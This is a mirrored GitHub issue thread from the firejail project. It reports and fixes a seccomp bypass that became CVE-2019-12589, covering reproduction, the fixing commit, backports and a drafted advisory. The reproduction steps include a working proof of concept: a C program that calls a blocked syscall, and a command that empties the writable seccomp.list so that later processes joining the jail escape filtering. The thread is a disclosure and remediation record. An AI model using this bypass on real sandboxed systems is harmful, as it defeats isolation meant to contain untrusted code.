[GH-ISSUE #2718] seccomp bypass when joining existing jail

gitea-mirror commented

2026-05-05 08:22:02 -06:00

Owner

Originally created by @apmorton on GitHub (May 21, 2019).
Original GitHub issue: https://github.com/netblue30/firejail/issues/2718

seccomp filters are copied into /run/firejail/mnt, and are writable within the jail.

A malicious process can modify files from inside the jail.
Processes that are later joined to the jail will not have seccomp filters applied.

repro steps

compile program to call blacklisted syscall

gcc -xc - <<EOF
#include <stdio.h>
#include <sys/klog.h>

int main(void) {
    printf("calling syslog syscall\n");
    klogctl(1, NULL, 0);
    printf("not killed\n");
}
EOF

create interactive jail session

$ firejail --quiet --name=jail

try to run program inside jail, noting syscall is blocked

$ ./a.out
calling syslog syscall
Bad system call (core dumped)

open new terminal and run program by joining jail, noting syscall is blocked

$ firejail --quiet --join=jail ./a.out
calling syslog syscall

back in original interactive jail session, empty the seccomp.list file and attempt to run program, noting syscall is blocked

$ echo -n "" > /run/firejail/mnt/seccomp.list
$ ./a.out
calling syslog syscall
Bad system call (core dumped)

open new terminal and run program by joining jail, noting syscall is NOT blocked

$ firejail --quiet --join=jail ./a.out
calling syslog syscall
not killed

Originally created by @apmorton on GitHub (May 21, 2019). Original GitHub issue: https://github.com/netblue30/firejail/issues/2718 seccomp filters are copied into `/run/firejail/mnt`, and are writable within the jail. A malicious process can modify files from inside the jail. Processes that are later joined to the jail will not have seccomp filters applied. ## repro steps compile program to call blacklisted syscall ``` gcc -xc - <<EOF #include <stdio.h> #include <sys/klog.h> int main(void) { printf("calling syslog syscall\n"); klogctl(1, NULL, 0); printf("not killed\n"); } EOF ``` create interactive jail session ```bash $ firejail --quiet --name=jail ``` try to run program inside jail, noting syscall is blocked ```bash $ ./a.out calling syslog syscall Bad system call (core dumped) ``` open new terminal and run program by joining jail, noting syscall is blocked ```bash $ firejail --quiet --join=jail ./a.out calling syslog syscall ``` back in original interactive jail session, empty the seccomp.list file and attempt to run program, noting syscall is blocked ```bash $ echo -n "" > /run/firejail/mnt/seccomp.list $ ./a.out calling syslog syscall Bad system call (core dumped) ``` open new terminal and run program by joining jail, noting syscall is *NOT* blocked ```bash $ firejail --quiet --join=jail ./a.out calling syslog syscall not killed ```

gitea-mirror

2026-05-05 08:22:02 -06:00

closed this issue
added the
bug

security
labels

gitea-mirror commented

2026-05-05 08:22:04 -06:00

Author

Owner

@chiraag-nataraj commented on GitHub (May 21, 2019):

echo -n "" > /run/firejail/mnt/seccomp.list

This fails for me with bash: /run/firejail/mnt/seccomp.list: Permission denied. Let me play around a bit, since idk if it's only a "my system" thing.

Which version of firejail are you running? Which distro?

@chiraag-nataraj commented on GitHub (May 21, 2019): > `echo -n "" > /run/firejail/mnt/seccomp.list` This fails for me with `bash: /run/firejail/mnt/seccomp.list: Permission denied`. Let me play around a bit, since idk if it's only a "my system" thing. Which version of firejail are you running? Which distro?

gitea-mirror commented

2026-05-05 08:22:05 -06:00

Author

Owner

@chiraag-nataraj commented on GitHub (May 21, 2019):

Okay, so I can replicate with current release, but not with current git master. Is that the same for you @apmorton?

@chiraag-nataraj commented on GitHub (May 21, 2019): Okay, so I can replicate with current release, but not with current git master. Is that the same for you @apmorton?

gitea-mirror commented

2026-05-05 08:22:06 -06:00

Author

Owner

@apmorton commented on GitHub (May 21, 2019):

confirmed, this is fixed on latest master.

seccomp files are put in /run/firejail/mnt/seccomp and is mounted as a read-only filesystem, which mitigates the issue.

@apmorton commented on GitHub (May 21, 2019): confirmed, this is fixed on latest master. seccomp files are put in `/run/firejail/mnt/seccomp` and is mounted as a read-only filesystem, which mitigates the issue.

gitea-mirror commented

2026-05-05 08:22:08 -06:00

Author

Owner

@chiraag-nataraj commented on GitHub (May 21, 2019):

In the future, if you think you have found a security vulnerability (which this certainly would qualify as), you should probably follow the directions in the readme (i.e. email netblue30).

@chiraag-nataraj commented on GitHub (May 21, 2019): In the future, if you think you have found a security vulnerability (which this certainly would qualify as), you should probably follow the directions in the readme (i.e. email netblue30).

gitea-mirror commented

2026-05-05 08:22:10 -06:00

Author

Owner

@chiraag-nataraj commented on GitHub (May 21, 2019):

@netblue30, this is fixed in git master, but apparently is an issue in the current release. How should we proceed?

@chiraag-nataraj commented on GitHub (May 21, 2019): @netblue30, this is fixed in git master, but apparently is an issue in the current release. How should we proceed?

gitea-mirror commented

2026-05-05 08:22:10 -06:00

Author

Owner

@apmorton commented on GitHub (May 21, 2019):

neither readme (README or README.md) have security disclosure procedures

edit: just noticed in CONTRIBUTING.md, apologies

@apmorton commented on GitHub (May 21, 2019): neither readme (`README` or `README.md`) have security disclosure procedures edit: just noticed in `CONTRIBUTING.md`, apologies

gitea-mirror commented

2026-05-05 08:22:11 -06:00

Author

Owner

@chiraag-nataraj commented on GitHub (May 21, 2019):

I'll add it to the README as well, since people might not think to look at CONTRIBUTING.

@chiraag-nataraj commented on GitHub (May 21, 2019): I'll add it to the README as well, since people might not think to look at CONTRIBUTING.

gitea-mirror commented

2026-05-05 08:22:11 -06:00

Author

Owner

@chiraag-nataraj commented on GitHub (May 22, 2019):

@apmorton, if you're comfortable, can you bisect the commits to figure out which one solved this? We should probably back-port just that fix...

@chiraag-nataraj commented on GitHub (May 22, 2019): @apmorton, if you're comfortable, can you bisect the commits to figure out which one solved this? We should probably back-port just that fix...

gitea-mirror commented

2026-05-05 08:22:11 -06:00

Author

Owner

@smitsohu commented on GitHub (May 22, 2019):

It is commit eecf35c2f8

@smitsohu commented on GitHub (May 22, 2019): It is commit eecf35c2f8249489a1d3e512bb07f0d427183134

gitea-mirror commented

2026-05-05 08:22:12 -06:00

Author

Owner

@chiraag-nataraj commented on GitHub (May 22, 2019):

Thanks @smitsohu! Should we back-port to LTS and current release?

@chiraag-nataraj commented on GitHub (May 22, 2019): Thanks @smitsohu! Should we back-port to LTS and current release?

gitea-mirror commented

2026-05-05 08:22:13 -06:00

Author

Owner

@smitsohu commented on GitHub (May 22, 2019):

@chiraag-nataraj We already have a new release candidate, and 0.9.58 will be replaced very soon anyways.

LTS is a different story, imho it should be backported. What does @startx2017 think?

@smitsohu commented on GitHub (May 22, 2019): @chiraag-nataraj We already have a new release candidate, and 0.9.58 will be replaced very soon anyways. LTS is a different story, imho it should be backported. What does @startx2017 think?

gitea-mirror commented

2026-05-05 08:22:13 -06:00

Author

Owner

@SkewedZeppelin commented on GitHub (May 22, 2019):

What about getting a CVE assigned?
And many distros still aren't even shipping 0.9.58.

@SkewedZeppelin commented on GitHub (May 22, 2019): What about getting a CVE assigned? And many distros still aren't even [shipping 0.9.58](https://pkgs.org/download/firejail).

gitea-mirror commented

2026-05-05 08:22:13 -06:00

Author

Owner

@smitsohu commented on GitHub (May 22, 2019):

What about getting a CVE assigned?
And many distros still aren't even shipping 0.9.58.

@netblue30 ?

@smitsohu commented on GitHub (May 22, 2019): > What about getting a CVE assigned? > And many distros still aren't even shipping 0.9.58. @netblue30 ?

gitea-mirror commented

2026-05-05 08:22:14 -06:00

Author

Owner

@SkewedZeppelin commented on GitHub (May 22, 2019):

this fine?

Subject: local seccomp bypass in firejail before 0.9.60-rc1

Austin Morton has discovered a local method to bypass/disable seccomp
filters of a firejail sandbox.

Versions of firejail before 0.9.60-rc1 or eecf35c2 do not mark seccomp
files read-only which allows overwriting them, once overwritten any
processes joined to the existing sandbox will not have seccomp enforced.
This can allow for a denial of service or elevation of privileges.

Reported here:
https://github.com/netblue30/firejail/issues/2718

Fixed in this commit:
https://github.com/netblue30/firejail/commit/eecf35c2

Compile tested backports for LTS, 0.9.52, 0.9.54, 0.9.56, and 0.9.58.2 are
available here:
https://github.com/netblue30/firejail/issues/2718#issuecomment-495010478

@SkewedZeppelin commented on GitHub (May 22, 2019): this fine? ``` Subject: local seccomp bypass in firejail before 0.9.60-rc1 Austin Morton has discovered a local method to bypass/disable seccomp filters of a firejail sandbox. Versions of firejail before 0.9.60-rc1 or eecf35c2 do not mark seccomp files read-only which allows overwriting them, once overwritten any processes joined to the existing sandbox will not have seccomp enforced. This can allow for a denial of service or elevation of privileges. Reported here: https://github.com/netblue30/firejail/issues/2718 Fixed in this commit: https://github.com/netblue30/firejail/commit/eecf35c2 Compile tested backports for LTS, 0.9.52, 0.9.54, 0.9.56, and 0.9.58.2 are available here: https://github.com/netblue30/firejail/issues/2718#issuecomment-495010478 ```

gitea-mirror commented

2026-05-05 08:22:14 -06:00

Author

Owner

@smitsohu commented on GitHub (May 22, 2019):

Pending backport to LTS and other versions.

More a side note: So far we as upstream only support the last version and LTS, and I tend to believe this is a wise decision. I'd say for earlier versions it is the maintainers job to backport fixes, in line with their respective distribution policy.

@smitsohu commented on GitHub (May 22, 2019): > Pending backport to LTS and other versions. More a side note: So far we as upstream only support the last version and LTS, and I tend to believe this is a wise decision. I'd say for earlier versions it is the maintainers job to backport fixes, in line with their respective distribution policy.

gitea-mirror commented

2026-05-05 08:22:14 -06:00

Author

Owner

@SkewedZeppelin commented on GitHub (May 22, 2019):

@smitsohu
okay updated, would you like to send it to the oss-security list?

@SkewedZeppelin commented on GitHub (May 22, 2019): @smitsohu okay updated, would you like to send it to the oss-security list?

gitea-mirror commented

2026-05-05 08:22:15 -06:00

Author

Owner

@SkewedZeppelin commented on GitHub (May 22, 2019):

I have done some backports here
https://gist.github.com/SkewedZeppelin/7f67a131a3d31bfa9d64eaf1a72b1971

edit: attached as a zip for archival purposes
eecf35c-backports.zip

@SkewedZeppelin commented on GitHub (May 22, 2019): I have done some backports here https://gist.github.com/SkewedZeppelin/7f67a131a3d31bfa9d64eaf1a72b1971 edit: attached as a zip for archival purposes [eecf35c-backports.zip](https://github.com/netblue30/firejail/files/3209720/eecf35c-backports.zip)

gitea-mirror commented

2026-05-05 08:22:15 -06:00

Author

Owner

@smitsohu commented on GitHub (May 23, 2019):

asked MITRE for a CVE number

@smitsohu commented on GitHub (May 23, 2019): asked MITRE for a CVE number

gitea-mirror commented

2026-05-05 08:22:16 -06:00

Author

Owner

@netblue30 commented on GitHub (May 26, 2019):

Thanks @apmorton

New release Monday morning. If you want to bring in any other fix, now is the time. If we don't get a CVE number by Monday, we'll add it later. I'll grab the patch from @SkewedZeppelin and add it in etc-fixes directory here on mainline. For LTS a new release probably sometime next week, there are some more fixes to be added there, I'll have to tak to @startx2017 .

@netblue30 commented on GitHub (May 26, 2019): Thanks @apmorton New release Monday morning. If you want to bring in any other fix, now is the time. If we don't get a CVE number by Monday, we'll add it later. I'll grab the patch from @SkewedZeppelin and add it in etc-fixes directory here on mainline. For LTS a new release probably sometime next week, there are some more fixes to be added there, I'll have to tak to @startx2017 .

gitea-mirror commented

2026-05-05 08:22:16 -06:00

Author

Owner

@rusty-snake commented on GitHub (May 26, 2019):

The RELNOTES should be updated, we have some new stuff like private-cwd or deterministic-exit-code and so on.

@rusty-snake commented on GitHub (May 26, 2019): The RELNOTES should be updated, we have some new stuff like private-cwd or deterministic-exit-code and so on.

gitea-mirror commented

2026-05-05 08:22:16 -06:00

Author

Owner

@netblue30 commented on GitHub (May 26, 2019):

RELNOTES done, anything missing just add it in. I'm doing some testing right now, tonight or tomorrow morning it should be out.

@netblue30 commented on GitHub (May 26, 2019): RELNOTES done, anything missing just add it in. I'm doing some testing right now, tonight or tomorrow morning it should be out.

gitea-mirror commented

2026-05-05 08:22:17 -06:00

Author

Owner

@reinerh commented on GitHub (May 30, 2019):

@smitsohu Was there already a reply regarding CVE number?

Edit: Did you use this form? https://cveform.mitre.org/

@reinerh commented on GitHub (May 30, 2019): @smitsohu Was there already a reply regarding CVE number? Edit: Did you use this form? https://cveform.mitre.org/

gitea-mirror commented

2026-05-05 08:22:17 -06:00

Author

Owner

@smitsohu commented on GitHub (May 30, 2019):

@reinerh We have no number assigned yet.

Yes, I used the webform. I think I'm going to ask if there is something we can do on our end to speed up the process.

@smitsohu commented on GitHub (May 30, 2019): @reinerh We have no number assigned yet. Yes, I used the webform. I think I'm going to ask if there is something we can do on our end to speed up the process.

gitea-mirror commented

2026-05-05 08:22:18 -06:00

Author

Owner

@netblue30 commented on GitHub (May 30, 2019):

@startx2017 started porting, we will have a LTS release by the end of the week with or without CVE.

@netblue30 commented on GitHub (May 30, 2019): @startx2017 started porting, we will have a LTS release by the end of the week with or without CVE.

gitea-mirror commented

2026-05-05 08:22:18 -06:00

Author

Owner

@reinerh commented on GitHub (May 30, 2019):

(FYI a backported fix is in Debian unstable since yesterday, together with a fix for #2401; and it has been unblocked for migration to Buster.)

@reinerh commented on GitHub (May 30, 2019): (FYI a backported fix is in Debian unstable since yesterday, together with a fix for #2401; and it has been unblocked for migration to Buster.)

gitea-mirror commented

2026-05-05 08:22:18 -06:00

Author

Owner

@carnil commented on GitHub (Jun 3, 2019):

CVE-2019-12589 was assigned for this issue.

@carnil commented on GitHub (Jun 3, 2019): [CVE-2019-12589](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12589) was assigned for this issue.

gitea-mirror commented

2026-05-05 08:22:19 -06:00

Author

Owner

@netblue30 commented on GitHub (Jun 8, 2019):

LTS version also released, CVE status page updated - https://firejail.wordpress.com/download-2/cve-status/

@netblue30 commented on GitHub (Jun 8, 2019): LTS version also released, CVE status page updated - https://firejail.wordpress.com/download-2/cve-status/

gitea-mirror referenced this issue

2026-05-05 10:12:50 -06:00

[PR #1710] [MERGED] Add profile for "playonlinux" #4051

Rows
Columns

[GH-ISSUE #2718] seccomp bypass when joining existing jail #1710

repro steps